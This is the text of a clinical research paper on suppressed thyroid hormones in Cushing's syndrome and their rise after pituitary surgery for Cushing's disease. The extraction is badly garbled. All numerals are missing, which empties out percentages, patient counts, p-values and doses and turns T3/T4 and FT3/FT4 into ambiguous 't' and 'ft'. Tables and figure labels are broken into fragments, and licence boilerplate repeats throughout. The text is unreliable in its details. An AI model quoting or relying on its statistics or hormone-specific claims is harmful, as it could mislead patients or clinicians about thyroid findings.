boni xiang*, ran tao*, xinhua liu, xiaoming zhu, min he, zengyi ma, yehong yang, zhaoyun zhang, yiming li, zhenwei yao, yongfei wang and hongying ye
department of endocrinology and metabolism, huashan hospital, fudan university, shanghai, china
department of neurosurgery, huashan hospital, fudan university, shanghai, china
department of radiology, huashan hospital, fudan university, shanghai, china
correspondence should be addressed to h ye: yehongying@huashan.org.cn
*(b xiang and r tao contributed equally to this work)

abstract
objective: the aim of this study was to evaluate thyroid functions in cushing's syndrome (cs) and the dynamic changes of thyroid hormones and antithyroid antibodies in cushing's disease (cd) pre- and postoperatively.
design and methods: this is a retrospective study enrolling patients with cs ( cd, adrenal cs and ectopic adrenocorticotropic syndrome (eas)). thyroid functions (thyroid-stimulating hormone (tsh), t , free t (ft ), t and free t (ft )) were measured in all cs patients at the time of diagnosis and in all cd patients months after transsphenoidal pituitary tumor resection. postoperative hormone monitoring within months was conducted in cd patients completing remission. twenty-eight remitted cd patients underwent hormone and antithyroid antibody evaluation preoperatively and in the rd, th and th month after surgery.
results: tsh, t and ft were below the reference range in %, % and % of the cs patients. remitted cd patients ( / ) had significantly higher tsh (p = . ), t (p = . ) and ft (p = . ) than those in the non-remission group ( / ). after remission of cd, tsh, t and ft showed a significant increase, with a few cases above the reference range. by months, most cd patients' thyroid functions had returned to normal. thyroid hormones (including tsh, t and ft ) were negatively associated with serum cortisol levels both before and after surgery. no significant changes of antithyroid autoantibodies were observed.
conclusions: tsh, t and ft are suppressed in endogenous hypercortisolemia. after remission of cd, tsh, t and ft increased significantly, even above the reference range, but returned to normal year after surgery in most cases. antithyroid antibodies did not change significantly after remission of cd.

introduction
cushing's syndrome (cs) comprises diverse manifestations resulting from chronic exposure to excess glucocorticoids. the incidence is . – . per million people per year. approximately % of endogenous cs is adrenocorticotrophin (acth)-dependent ( ), and % is acth-independent. pituitary corticotroph adenoma (cushing's disease (cd)) is the most common cause ( ), followed by primary unilateral adrenal adenomas and ectopic adrenocorticotropic syndrome (eas).
the clinical presentation includes reddish purple striae, - - key words f cushing’s syndrome f cushing’s disease f cortisol f thyroid hormones f antithyroid antibodies endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:yehongying@huashan.org.cn https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : plethora, proximal muscle weakness and metabolic disorders (central obesity, hypertension, diabetes mellitus and dyslipidemia). the inhibitory effect of hypercortisolemia on the hypothalamic–pituitary axis is most commonly characterized by menstrual abnormalities in adults and growth retardation in children. besides, the thyroid hormone changes in hypercortisolemia have been reported since . fredrickson  et  al. described that massive doses of cortisone acetate decreased iodine- (i ) accumulation in the thyroid of euthyroid patients ( ). dexamethasone administration ( mg daily for .  days) was reported to reduce the thyroid-stimulating hormone (tsh) and free t (ft ) secretion and blunted the tsh response to thyrotropin-releasing hormone (trh) ( ). regarding endogenous hypercortisolemia, a study of three patients with adrenal cs showed similar results ( ). kuku reported that serum tsh response to trh was impaired in eight patients with cd. the impairment was relieved after a pituitary implant of au ( ). primary cortisol deficiency was reported concomitant with high tsh and low ft . after cortisone administration, tsh returned to normal. however, serum cortisol and tsh showed no significant correlation ( ). in , tamada et al. first reported ‘hyperthyroidism’ in two cs patients after surgery due to ‘syndrome of inappropriate secretion of tsh’ (sitsh) associated with the insufficient replacement of hydrocortisone (hc) ( ). free t and tsh were normalized after a hc dose increase ( ). then, the same group investigated the clinical course in eight cs patients and found that free t levels were above the reference range in % of patients up to  months after surgery, and all returned to normal within   year ( ). they suggested that cured cs patients might develop high t or t with normal or elevated tsh ( ). endogenous cs is an uncommon disease. there has not yet been a large sample in which the clinical course of thyroid hormone changes was studied before and after remission of endogenous cs. in clinical practice, because of the lack of knowledge about this condition, some cs patients’ thyroid functions may be mistaken as evidence of hypothyroidism or hyperthyroidism after surgery and even led to the medication of antithyroid drugs. the aim of our study was to evaluate the thyroid functions of patients with cs, compare the hormone levels in patients with different etiologies, and investigate the clinical course of fluctuations of thyroid hormones in patients with cd pre- and postoperatively. patients and methods patients this study included cs patients who were hospitalized in the department of endocrinology and metabolism of huashan hospital between january and april . 
they were diagnosed with either cd (n = , median age: .   years, range –   years, female/male: / ), adrenal cs (n = , median age: .  years, range –  years, female/male: / ) or eas (n = , median age: .   years, range –   years, female/male: / ). all subjects had a comprehensive clinical evaluation by the same group of endocrinology specialists and all patients with cd underwent primary resection at our institution by the same surgeon. none of the patients had a history of thyroid diseases. methods data on clinical findings, laboratory findings, imaging findings, treatment and outcome were obtained. all cd patients (microadenomas: / , macroadenomas: / ) underwent transsphenoidal pituitary tumor resection (tss) through a microscope or endoscope. remission was defined as morning serum cortisol levels lower than . μg/dl within   days of selective tumor resection ( ). the cortisone replacement began after remission, and cortisone dosage prescribed was based on the serum cortisol levels and the symptoms. thyroid hormones (tsh, t , ft , t and free t (ft )) and serum cortisol were measured in all patients before treatment. in all cd patients, thyroid hormones and serum cortisol were measured   months after surgery. the hormones were measured before surgery and   day,  weeks,  month,  months and  months after surgery in nine cd patients completing remission. in remitted cd patients, the hormones and antithyroid autoantibodies were measured , and  months after surgery. hormonal assays samples were obtained at : h before any medication. serum thyroid hormones (tsh, t , ft , t and ft ) and antithyroid autoantibodies (tpo-ab and atg) were assessed by immunoenzymometric assay method (advia centaur®; siemens healthcare diagnostics inc.). serum cortisol was measured by chemiluminescent enzyme immunoassay (cobas® e , roche diagnostics). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : statistical analyses normal distributed continuous variables were expressed as mean values ± standard deviation (s.d.). t-test was used to compare means between groups. simple linear regression coefficients and multiple regression analysis were used to examine the correlation among parameters. spss . (spss) was used. a two-tailed p value < . was considered statistically significant. ethical approval the study was approved by the ethics committee of huashan hospital attached to fudan university (#ky - ). consent has been obtained from each patient or subject after full explanation of the purpose and nature of all procedures used. results at the time of diagnosis, tsh, t , ft , t and ft levels were below the reference range in %, %, %, % and % of cs patients, respectively (table  ). none of the patients had elevated thyroid hormones. in ( %) patients, low tsh with low t or t was found. regarding different etiologies, serum cortisol in patients with eas was higher than that in adrenal cs ( . ± . μg/dl vs . ± . μg/dl, p = . ) and cd ( . ± . μg/dl vs . ± . μg/dl, p = . ). 
ft and ft in eas were also the lowest, with significance when comparing with those in cd (ft : . ± . nmol/l vs . ± . pmol/l, p = . ; ft : . ± . nmol/l vs . ± . pmol/l, p = . ) (table  ). three months after surgery, / cd patients developed remission. the median dose of cortisone acetate for post-surgery and rd-month replacement treatment were separately . mg/day ( ~ mg/day) and . mg/day ( ~ . mg/day) in remission group. twenty of the remitted patients needed no more cortisone replacement on the third month. postoperative tsh ( . ± . miu/l vs . ± . miu/l, p = . ), t ( . ± . nmol/l vs . ± . nmol/l, p = . ), ft ( . ± . pmol/l vs . ± . pmol/l, p = . ), t ( . ± . nmol/l vs . ± . nmol/l, p = . ) were higher than those before surgery (fig.  and table  ). tsh in . % ( / ), t in . % ( / ) and ft in . % ( / ) were above the reference range   months after surgery in the remission group. however, ft slightly decreased after surgery (before surgery: . ± . pmol/l,   months after surgery: . ± . pmol/l, p = . ). moreover, elevated t , ft and ft with nonsuppressed tsh were seen in / ( . %) cases. we investigated the clinical parameters between the remission and non-remission groups (fig.  and table  ). before surgery, serum cortisol and thyroid hormones showed no difference between the two groups. however,   months after surgery, tsh (p = . ), t (p = . ) and ft (p = . ) became significantly higher in the remission group. t of the two groups showed no difference (p = . ). ft levels in the remission group were lower than those in the non-remission group ( . ± . pmol/l vs . ± . pmol/l, p = . ). correlation analyses between levels of serum cortisol and thyroid hormones were conducted in the cs patients before surgery and the cd patients  months after surgery. significant negative correlations between thyroid hormones and serum cortisol both before and after surgery were found (table  ). we also analyzed the correlations between tumor size and preoperative serum cortisol/thyroid functions in all the cd patients (n = ), but the association turned out insignificant. besides, the correlation among several parameters, including thyroid hormones, serum cortisol levels, age, gender, bmi and tumor size were analyzed using simple linear regression analysis (table  ). it revealed marked negative correlations between serum cortisol levels and thyroid function parameters including tsh (p = . ), t (p = . ) and ft (p = . ) before surgery. in addition, bmi was positively associated with t (p = . ) and ft (p = . ) and age were inversely associated with ft (p = . ) and ft (p = . ). however, after surgery, the only variable significantly affecting thyroid hormones was serum cortisol (in postoperative analyses, the variable ‘tumor size’ was excluded). for the nine remitted patients whose thyroid functions were closely monitored within   months, the table  characteristics of patients with cushing’s syndrome before treatment. cushing’s syndrome reference range number / age, years . ( . – . ) / female/male / / serum cortisol (µg/dl) . ( . – . ) / tsh (miu/l) . ( . – . ) . ~ . t (nmol/l) . ( . – . ) . ~ . t (nmol/l) . ( . – . ) . ~ . ft (pmol/l) . ( . – . ) . ~ . ft (pmol/l) . ( . – . ) . ~ . data are median (minimum–maximum). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : median dose of cortisone acetate for post-surgery, second week, first month, second month and third-month replacement treatment were . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day) and . mg/day ( ~ . mg/day). two of the nine patients received no cortisone replacement after surgery (fig.  ). among them, we found that tsh started to rise since the first day after surgery (the increase became statistically remarkable since the second week and the significance lasted till the third month). ft and t became lower on the first day and then rose up markedly. the changes of t and ft table  comparative study between cd, adrenal adenoma and eas. cd adrenal adenoma eas reference range n / age (years) . ( . , . ) . ( . , . ) . ( . , . ) / male/female / / / / serum cortisol (µg/dl) .  ±  . .  ±  . .  ±  . a / tsh (miu/l) .  ±  . .  ±  . .  ±  . . ~ . t (nmol/l) .  ±  . .  ±  . .  ±  . . ~ . t (nmol/l) .  ±  . .  ±  . .  ±  . . ~ . ft (pmol/l) .  ±  . b .  ±  . .  ±  . b . ~ . ft (pmol/l) .  ±  . b .  ±  . .  ±  . b . ~ . aserum cortisol of eas was significantly higher than that of adrenocortical adenoma (p =  . ) and cd (p =  . ). bft (p =  . ) and ft (p =  . ) in eas were significantly lower than those in cd. figure  comparison between remission (n =  ) and non-remission (n =  ) groups in cd patients before and  months after surgery. in the remission group, compared to those before surgery: serum cortisol level (a) dropped significantly; tsh (p =  . ), t (p =  . ), t (p =  . ) and ft (p =  . ) (panel (b, c, d and e)) showed significant increase; ft (f) slightly decreased after surgery (p =  . ). neither serum cortisol nor thyroid hormones showed notable difference before surgery between remission and non-remission group. three months after surgery, with the reduction of serum cortisol in remission group, tsh (b), t (c) and ft (e) became significantly lower than those in the non- remission group (p =  . for all three indexes). ft (f) levels in remission group were significantly lower than those in the non-remission group in the third month postoperative evaluation (p =  . ). the gray bands in panel (b, c, d, e and f) represent the reference range values. the lines represent mean values (±s.d.). *p <  . , **p <  . . before surgery months after surgery remission non-resmission se ru m co rt is ol (u g/ dl ) * * * * a remission non-resmission tt (n m ol /l ) * * * *c remission non-resmission ft (p m ol /l ) * * * * e remission non-resmission ts h (m iu /l ) * * * *b remission non-resmission tt (n m ol /l ) * * d remission non-resmission ft (p m ol /l ) f * * * this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . 
/ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : were not significant, except for ft ’s transient decrease on the second month. in the patients of the remission group undergoing -year follow-up (fig.  ), serum cortisol level markedly dropped after surgery. the median dose of cortisone acetate for post-surgery, rd-month, th-month and th-month replacement treatment were . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day) and mg/day ( ~ . mg/day). the proportion of patients receiving cortisone replacement for post-surgery day, rd month, th month and th month were . , . , . and . % separately. compared to those before surgery, tsh, t and ft showed constant significant increase postoperatively. elevated tsh above the reference range was found in two, four and three patients on the rd, th and th month. high t was seen in only three patients on the third month and then all returned to normal in the th- and th-month evaluation. abnormally elevated ft was seen in six patients on the rd month, two on the th month and then only one by   months. ft level dropped on the rd and th months but returned to no difference from the baseline level by   months. the alternation of t was not notable, with . % ( / ) of patients in the remission group constantly maintaining normal t level. overall tpo-ab and atg showed no significant change during the -year follow-up. discussion the changes of thyroid hormone in hypercortisolemia have been studied for   years. the results of previous studies were limited by small sample sizes and incomplete thyroid hormone indexes ( , ). we investigated thyroid function indexes (including tsh, t , t , ft and ft ) in cs patients, which, to date, was the largest sample. we found that in the cs patients, the incidence of low tsh, t and ft was relatively high (tsh, %; t , %; ft , %) before treatment. besides, none of the thyroid function indexes was above the reference range in active cs. in addition, this is also the first report comparing thyroid hormones among cd, adrenal cs and eas. we found that the levels of ft and ft in eas group, who bore the highest serum cortisol level, were lower than those in cd and adrenal cs. therefore, we recommend table  serum cortisol and thyroid functions of cd patients before and  months after surgery. remission group (n =  ) non-remission group (n =  ) pc pdbefore surgery  months after surgery pa before surgery  months after surgery pb serum cortisol (μg/dl) .  ±  . .  ±  . . .  ±  . .  ±  . . . . tsh (miu/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . t (nmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . t (nmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . ft (pmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . ft (pmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . acomparison between hormones before and  months after surgery in remission group. bcomparison between hormones before and  months after surgery in the non-remission group. ccomparison between remission and non-remission group before surgery. dcomparison between remission and non-remission group  months after surgery. table  correlations between serum cortisol and thyroid hormones. r p before surgery (n =  )a serum cortisol tsh − . d . t − . d . t − . c . ft − . d . ft − . d . three months after surgery (n =  )b serum cortisol tsh − . d . t − . d . t − . . ft − . d . ft . c . acorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with cs (n =  ) before surgery. 
bcorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with cd (n =  ) after surgery. cp <  . , dp <  . . this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : testing for cs in patients with low thyroid hormones and low tsh. in the cd patients, the remission group had higher tsh, t and ft levels than the non-remission group on the third month after surgery. in the remission group, . % ( / ) tsh, . % ( / ) t and . % ( / ) ft were above the reference range. moreover, . % ( / ) of patients in the remission group exhibited elevated thyroid hormones (t , ft and ft ) with nonsuppressed tsh. within the -month monitoring of the nine cd patients in remission group, we observed that tsh increased immediately  day after surgery and the increase started to exhibit significance since the second week postoperatively. t and ft levels went down   day after surgery and then rose up to markedly higher levels. clinicians should be careful not to misdiagnose these conditions as hyperthyroidism and we recommend testing for thyroid function after surgery in patients with cd. it is well known that glucocorticoids exert an inhibitory action on the hypothalamic–pituitary–thyroid axis ( , ). previous reports documented that glucocorticoids decreased the release of trh and tsh in the hypothalamic and pituitary ( , , , , , ), and increased type deiodinase (d ) activity, which was known to mainly convert t to t in the central nervous system, and eventually suppressed tsh and thyroid hormone (t and t ) secretion ( , ). the glucocorticoids also decreased type deiodinase (d ), known to convert serum t to t ( ), and that possibly explains the relatively normal t and ft concentrations in active cs. there have been few studies showing the correlation between serum cortisol and thyroid hormones ( ). in our study, we found significant negative correlations between thyroid hormones (tsh, t and ft ) and cortisol levels both before and after surgery. in the remission group, as the glucocorticoid concentration went down, tsh, t and ft increased significantly. tsh’s immediate increase after surgery was very likely to be caused by reduced d activity in the central nervous system. the mechanism of high t and ft might be the rise of tsh level and d activity in the periphery. a previous study reported elevated ft with unsuppressed tsh in cs patients   month after surgery ( ). they recruited eight patients and measured tsh, ft and ft only at st, rd, th and th month. our study included closer monitoring of patients’ thyroid function postoperatively and we found that tsh increased immediately after surgery. t and ft went down on the first day after surgery and then rose up notably. the transient decrease of t and ft may be explained by ‘low- t syndrome’ resulting from surgery stress. throughout our -year follow-up, t did not fluctuate as notably as tsh, t and ft did, and . % ( / ) of patients in the remission group constantly maintained normal t level. 
this may be due to increased conversion from t to t in the periphery. space-occupying lesion of the pituitary is the most common cause of central hypothyroidism, which is defined as low thyroid hormones in conjunction with a low or inappropriately normal tsh level. however, microadenomas are commonly thought unlikely to compromise pituitary functions ( ). as is known, microadenomas are quite common in cd. nestoras mathioudakis reported ( ) that the prevalence of central hypothyroidism was higher in acth micros ( %) compared with prolactin micros ( %) and nonfunctioning adenomas (nfas) ( %). nevertheless, they found no correlation between free t or tsh and the degree of hypercortisolism in that study. in our study, we found no correlation between tumor size and thyroid table  significant determinants of thyroid hormones in cd (n =  ) with variable parameters in multiple regression analysis. dependent variables independent variables unstandardized coefficients standardized coefficients p % cib beta before surgery tsh f − . − . . ( . , . ) t f − . − . . (− . , − . ) bmi . . . ( . , . ) ft f − . − . . (− . , − . ) age − . − . . (− . , − . ) bmi . . . ( . , . ) ft age − . − . . (− . , − . ) after surgery tsh f − . − . . (− . , − . ) t f − . − . . (− . , − . ) ft f − . − . . (− . , − . ) parameters analyzed included serum cortisol levels, bmi, gender, age and tumor size (in postoperative analyses, tumor size was excluded). f: serum cortisol. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : hormone/serum cortisol. marked correlations between thyroid hormones and serum cortisol were observed. all patients received transsphenoidal surgery at the same clinic by an experienced surgeon. therefore, we considered that the changes of thyroid hormones in cd were related to serum cortisol alternation, rather than surgery. normalization of hypercortisolism of cs is associated with the induction of autoimmunity ( ). some studies attributed the high tsh with/without low ft to exacerbation of underlying autoimmune disease along with the decline of serum cortisol concentration, sometimes accompanied by the increased titer of antithyroid antibodies ( , ). in our -year follow-up (n = ), tsh, t and ft levels significantly rose up after surgery in the remission group. ft levels decreased on the third and sixth months. moreover, in the hormone evaluation of all the cd patients (n = ), we found that ft in the remission group (n = ) became significantly lower after surgery. also, the postoperative ft in the remission group (n = ) was lower than that in the non- remission group (n = ) on the third month. this may be due to transiently increased conversion from t to t along with the disinhibition of d . furthermore, we find no significant fluctuation of anti-thyroperoxidase antibodies or antithyroglobulin antibodies by   year after surgery. therefore, for now, we hold the view that figure  changes in thyroid function in nine cd patients in the remission group within  months after surgery. 
serum cortisol (a) markedly dropped after surgery. panel (b) shows the daily doses of cortisone acetate within  months in the nine patients postoperatively. two of the nine patients received no cortisone replacement after surgery tsh (c), t (d), and ft (f) showed a significant increase. t (e) and ft (g) showed no significant change except for the ft ’s decrease on the second month. the gray bands in panels c, d, e, f and g represent the reference range values. the lines represent mean values (±s.d.) in panel (c, d, e, f and g). be fo re po st su rg er y w m m m se ru m co rt is ol (u g/ dl ) a po st su rg er y w m m m do se of co rt is on e ac et at e (m g/ d) b before d w m m m ts h (m iu /l ) p= . p= . p= . p= . c before d w m m m tt (n m ol /l ) p= . p= . p= . d p= . before d w m m m tt (n m ol /l ) e before d w m m m ft (p m ol /l ) p= . p= . p= . f before d w m m m ft (p m ol /l ) g p= . this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : high tsh with low ft after remission of cd is caused by the reduction of serum cortisol, and it should not be defined as primary hypothyroidism. however, as previous studies showed the elevation of thyroid autoantibodies could occur from the second month to the eighth year after surgery ( ), further follow-up should be needed for the thyroid autoantibodies to exhibit probable significant alternation. figure  changes in thyroid hormones, tsh and antithyroid autoantibodies in cd patients in the remission group by  months after surgery. serum cortisol (a) dropped immediately after surgery and then gradually increased. the median dose of cortisone acetate (b) for post-surgery, rd-month, th-month and th-month replacement treatment were .  mg/day, .  mg/day, .  mg/day and  mg/day. the proportion of patients receiving cortisone replacement for post-surgery day, rd month, th month and th month were . , . , . and . % separately. tsh (c), t (d) and ft (f) showed a significant increase in all the postoperative evaluation. ft (g) transiently decreased on the third and sixth month but returned to no difference from the baseline level by  months. t (e) and antithyroid autoantibodies did not change significantly by  months after surgery. the gray bands in panel (c, d, e, f, g, h and i) represent the reference range values. the lines respectively represent median (minimum–maximum) in panel (b), and mean values (±s.d.) in panel (a) and (c, d, e, f, g, h and i). before m m m se ru m co rt is ol (u g/ dl ) a p= . p= . p= . post surgery m m m da ily do se of co rt is on e ac et at e (m g/ d) b before m m m ts h (m iu /l ) c p= . p= . p= . before m m m tt (n m ol /l ) d p= . p= . p= . before m m m tt (n m ol /l ) e before m m m ft (p m ol /l ) f p= . p= . p= . before m m m ft (p m ol /l ) g p= . p= . before m m m tp o -a b (u /m l) h before m m m a tg (u /m l) i this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : limitation the changes of thyroid functions of adrenal adenoma and eas after surgery were not elucidated. conclusion our study revealed the inhibitory action of endogenous hypercortisolemia on hypothalamic–pituitary–thyroid (hpt) axis, in which tsh, t and ft levels were suppressed. there were negative correlations between serum cortisol and thyroid hormones (tsh, t and ft ). after remission of cd, tsh, t and ft increased significantly, even above the reference range, and mostly returned to normal  year after surgery. the changes of thyroid hormones in cd were associated with serum cortisol alternation, not surgery. antithyroid antibodies showed no significant change after remission of cd. we recommend testing for cs in patients with low thyroid hormones and low tsh. in addition, post-treatment cd patients with high tsh and t should be carefully investigated so as not to be misdiagnosed with hyperthyroidism. the molecular mechanism of the changes of thyroid functions after remission of cd is not fully elucidated. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this research did not receive any specific grant from any funding agency in the public, commercial or not-for-profit sector. author contribution statement hongying ye designed the research; boni xiang, ran tao, xinhua liu, min he, xiaoming zhu, yiming li, zhenwei yao, yongfei wang, zengyi ma, and hongying ye diagnosed, treated, followed the patients; boni xiang, ran tao and hongying ye analyzed the data, wrote and edited the manuscript. acknowledgments the authors acknowledge the collaboration of the patients and all the doctors involved in the diagnosis and treatment. references nieman lk, biller bm, findling jw, newell-price j, savage mo, stewart pm & montori vm. the diagnosis of cushing’s syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) lacroix a, feelders ra, stratakis ca & nieman lk. cushing’s syndrome. lancet – . (https://doi.org/ . / s - ( ) - ) fredrickson ds, forsham ph & thorn gw. the effect of massive cortisone therapy on measurements of thyroid function. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jcem- - - ) re rn, kourides ia, ridgway ec, weintraub bd & maloof f. the effect of glucocorticoid administration on human pituitary secretion of thyrotropin and prolactin. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) otsuki m, dakoda m & baba s. influence of glucocorticoids on trf- induced tsh response in man. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) kuku sf, child df, nader s & fraser tr. thyrotrophin and prolactin responsiveness to thyrotrophin releasing hormone in cushing’s disease. clinical endocrinology – . (https://doi. org/ . /j. - . .tb .x) barnett ah, donald ra & espiner ea. 
high concentrations of thyroid-stimulating hormone in untreated glucocorticoid deficiency: indication of primary hypothyroidism? bmj – . (https://doi.org/ . /bmj. . . -a) tamada d, onodera t, kitamura t, yamamoto y, hayashi y, murata y, otsuki m & shimomura i. hyperthyroidism due to thyroid-stimulating hormone secretion after surgery for cushing’s syndrome: a novel cause of the syndrome of inappropriate secretion of thyroid-stimulating hormone. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) tamada d, kitamura t, onodera t, hamasaki t, otsuki m & shimomura i. clinical significance of fluctuations in thyroid hormones after surgery for cushing’s syndrome. endocrine journal – . (https://doi.org/ . /endocrj.ej - ) nieman lk, biller bm, findling jw, murad mh, newell-price j, savage mo, tabarin a & endocrine society. treatment of cushing’s syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) estupina c, belmar j, tapiaarancibia l, astier h & arancibia s. rapid and opposite effects of dexamethasone on in vivo and in vitro hypothalamic somatostatin release. experimental brain research – . (https://doi.org/ . /bf ) nakagawa k, ishizuka t, shimizu c, ito y & wakabayashi i. increased hypothalamic somatostatin messenger-rna following dexamethasone administration in rats. acta endocrinologica – . (https://doi.org/ . /acta. . ) cintra a, fuxe k, wikstrom ac, visser t & gustafsson ja. evidence for thyrotropin-releasing-hormone and glucocorticoid receptor- immunoreactive neurons in various preoptic and hypothalamic nuclei of the male-rat. brain research – . (https://doi. org/ . / - ( ) - ) kakucska i, qi yp & lechan rm. changes in adrenal status affect hypothalamic thyrotropin-releasing-hormone gene-expression in parallel with corticotropin-releasing hormone. endocrinology – . (https://doi.org/ . /endo. . . ) perez-martinez l, carreon-rodriguez a, gonzalez-alzati me, morales c, charli jl & joseph-bravo p. dexamethasone rapidly regulates trh mrna levels in hypothalamic cell cultures: interaction with the camp pathway. neuroendocrinology – . (https://doi.org/ . / ) alkemade a, unmehopa ua, wiersinga wm, swaab df & fliers e. glucocorticoids decrease thyrotropin-releasing hormone messenger ribonucleic acid expression in the paraventricular nucleus of the human hypothalamus. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . /bmj. . . -a https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /endocrj.ej - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /bf https://doi.org/ . /acta. . https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . /endo. . . https://doi.org/ . / https://doi.org/ . /jc. - https://creativecommons.org/licenses/by-nc-nd/ . 
chiamolera mi & wondisford fe. minireview: thyrotropin-releasing hormone and the thyroid hormone feedback mechanism. endocrinology – . (https://doi.org/ . /en. - )
coppola a, meli r & diano s. inverse shift in circulating corticosterone and leptin levels elevates hypothalamic deiodinase type in fasted rats. endocrinology – . (https://doi.org/ . /en. - )
kitahara h, imai y, yamauchi k, tomita a & mizuno s. pituitary-thyroid function in patients with cushing's syndrome – comparative study before and after extirpation of adrenal cortex tumor. nihon naibunpi gakkai zasshi – . (https://doi.org/ . /endocrine . . _ )
freda pu, beckers am, katznelson l, molitch me, montori vm, post kd, vance ml & endocrine society. pituitary incidentaloma: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - )
mathioudakis n, thapa s, wand gs & salvatori r. acth-secreting pituitary microadenomas are associated with a higher prevalence of central hypothyroidism compared to other microadenoma types. clinical endocrinology – . (https://doi.org/ . /j. - . . .x)
da mota f, murray c & ezzat s. overt immune dysfunction after cushing's syndrome remission: a consecutive case series and review of the literature. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - )
sahoo jp, selviambigapathy j, kamalanathan s, nagarajan k & vivekanandan m. effect of steroid replacement on thyroid function and thyroid autoimmunity in addison's disease with primary hypothyroidism. indian journal of endocrinology and metabolism – . (https://doi.org/ . / - . )
